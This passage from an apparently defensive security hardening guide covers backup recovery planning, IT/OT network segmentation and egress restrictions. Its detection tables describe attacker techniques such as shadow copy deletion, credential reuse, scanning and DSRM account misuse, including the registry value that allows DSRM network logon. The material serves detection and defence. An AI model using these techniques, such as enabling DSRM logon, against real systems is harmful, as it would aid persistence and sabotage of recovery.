style="vertical-align: baseline;">Critical asset recovery is dependent upon in-depth planning and preparation, which is often included within an organization's business continuity plan (BCP). Planning and recovery preparation should include the following core competencies:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A well-defined understanding of crown jewels data and supporting applications that align to backup, failover, and restoration tasks that prioritize mission-critical business operations</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Clearly defined asset prioritization and recovery sequencing</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Thoroughly documented recovery processes for critical systems and data</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Trained personnel to support recovery efforts</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Validation of recovery processes to ensure successful execution</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Clear delineation of responsibility for managing and verifying data and application backups</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Online and offline data backup retention policies, including initiation, frequency, verification, and testing (for both on-premises and cloud-based data)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Established service-level agreements (SLAs) with vendors to prioritize application and infrastructure-focused support</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Continuity and recovery planning can become stale over time, and processes are often not updated to reflect environment and personnel changes. Prioritizing evaluations, continuous training, and recovery validation exercises will enable an organization to be better prepared in the event of a disaster.</span></p> <h4><span style="vertical-align: baseline;">Detection Opportunities for Backups</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> </div> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Volume Shadow Deletion</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1490/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1490 – Inhibit System Recovery</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for instances where a threat actor will delete volume shadow copies to inhibit system recovery. This can be accomplished using the command line, PowerShell, and other utilities.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Unauthorized Access Attempt</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for unauthorized users attempting to access the media and applications that are used to manage data backups.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Suspicious Usage of the DSRM Password</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor security event logs on domain controllers for:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Event ID 4794 - An attempt was made to set the Directory Services Restore Mode administrator password</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Monitoring the following registry key on domain controllers:<br/><br/></span></p> <pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 4: DSRM registry key for monitoring</span></p> <p><span style="vertical-align: baseline;">The possible values for the registry key noted in Figure 4 are:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">0</code><span style="vertical-align: baseline;"> (default): The DSRM Administrator account can only be used if the domain controller is restarted in Directory Services Restore Mode.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">1</code><span style="vertical-align: baseline;">: The DSRM Administrator account can be used for a console-based log on if the local </span><span style="font-style: italic; vertical-align: baseline;">Active Directory Domain Services</span><span style="vertical-align: baseline;"> service is stopped.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">2</code><span style="vertical-align: baseline;">: The DSRM Administrator account can be used for console or network access without needing to reboot a domain controller.</span></p> </li> </ul> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table <span style="vertical-align: baseline;">4: Detection opportunities for backups</span></span></div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">IT and OT Segmentation</span></h4> <p><span style="vertical-align: baseline;">Organizations should ensure that there is both physical and logical segmentation between corporate information technology (IT) domains, identities, networks, and assets and those used in direct support of operational technology (OT) processes and control. By enforcing IT and OT segmentation, organizations can inhibit a threat actor's ability to pivot from corporate environments to mission-critical OT assets using compromised accounts and existing network access paths. </span></p> <p><span style="vertical-align: baseline;">OT environments should leverage separate identity stores (e.g., dedicated Active Directory domains), which are not trusted or cross-used in support of corporate identity and authentication. </span><strong style="vertical-align: baseline;">The compromise of a corporate identity or asset should not result in a threat actor's ability to directly pivot to accessing an asset that has the ability to influence an OT process.</strong></p> <p><span style="vertical-align: baseline;">In addition to separate AD forests being leveraged for IT and OT, segmentation should also include technologies that may have a dual use in the IT and OT environments (backup servers, antivirus [AV], endpoint detection and response [EDR], jump servers, storage, virtual network infrastructure). OT segmentation should be designed such that if there is a disruption in the corporate (IT) environment, the OT process can safely function independently, without a direct dependency (account, asset, network pathway) with the corporate infrastructure. For any dependencies that cannot be readily segmented, organizations should identify potential short-term processes or manual controls to ensure that the OT environment can be effectively isolated if evidence of an IT (corporate)-focused incident were detected. </span></p> <p><span style="vertical-align: baseline;">Segmenting IT and OT environments is a best practice recommended by industry standards such as the National Institute of Standards and Technology (NIST) <em>SP 800-82r3</em></span><span style="font-style: italic; vertical-align: baseline;">: <a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf" rel="noopener" target="_blank">Guide to Operational Technology (OT) Security</a></span><span style="vertical-align: baseline;"> and </span><a href="https://www.isa.org/intech-home/2018/september-october/departments/new-standard-specifies-security-capabilities-for-c" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">IEC 62443</span></a><span style="vertical-align: baseline;"> (formerly ISA99).</span></p> <p><span style="vertical-align: baseline;">According to these best-practice standards, segmenting IT and OT networks should include the following:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">OT attack surface reduction by restricting the scope of ports, services, and protocols that are directly accessible within the OT network from the corporate (IT) network.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Incoming access from corporate (IT) into OT must terminate within a segmented OT demilitarized zone (DMZ). The OT DMZ must require that a separate level of authentication and access be granted (outside of leveraging an account or endpoint that resides within the corporate IT domain). </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Explicit firewall rules should restrict both incoming traffic from the corporate environment and outgoing traffic from the OT environment.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Firewalls should be configured using the principle of deny by default, with only approved and authorized traffic flows permitted. Egress (internet) traffic flows for all assets that support OT should also follow the deny-by-default model.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Identity (account) segmentation must be enforced between corporate IT and OT. An account or endpoint within either environment should not have any permissions or access rights assigned outside of the respective environment. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Remote access to the OT environment should not leverage similar accounts that have remote access permissions assigned within the corporate IT environment. </span><strong style="vertical-align: baseline;">MFA using separate credentials should be enforced for remotely accessing OT assets and resources.</strong></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Training and verification of manual control processes, including isolation and reliability verification for safety systems.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Secured enclaves for storing backups, programming logic, and logistical diagrams for systems and devices that comprise the OT infrastructure.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The default usernames and passwords associated with OT devices should always be changed from the default vendor configuration(s). </span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Detection Opportunities for IT and OT Segmented Environments</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Network Service Scanning</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1046/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1046 – Network Service Scanning</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for instances where a threat actor is performing internal network discovery to identify open ports and services between segmented environments.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Unauthorized Authentication Attempts Between Segmented Environments</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for failed logins for accounts limited to one environment attempting to log in within another environment. This can detect threat actors attempting to reuse credentials for lateral movement between networks.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 5: Detection opportunities for IT and OT segmented environments</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Egress Restrictions</span></h4> <p><span style="vertical-align: baseline;">Servers and assets that are infrequently rebooted are highly targeted by threat actors for establishing backdoors to create persistent beacons to command-and-control (C2) infrastructure. By blocking or severely limiting internet access for these types of assets, an organization can 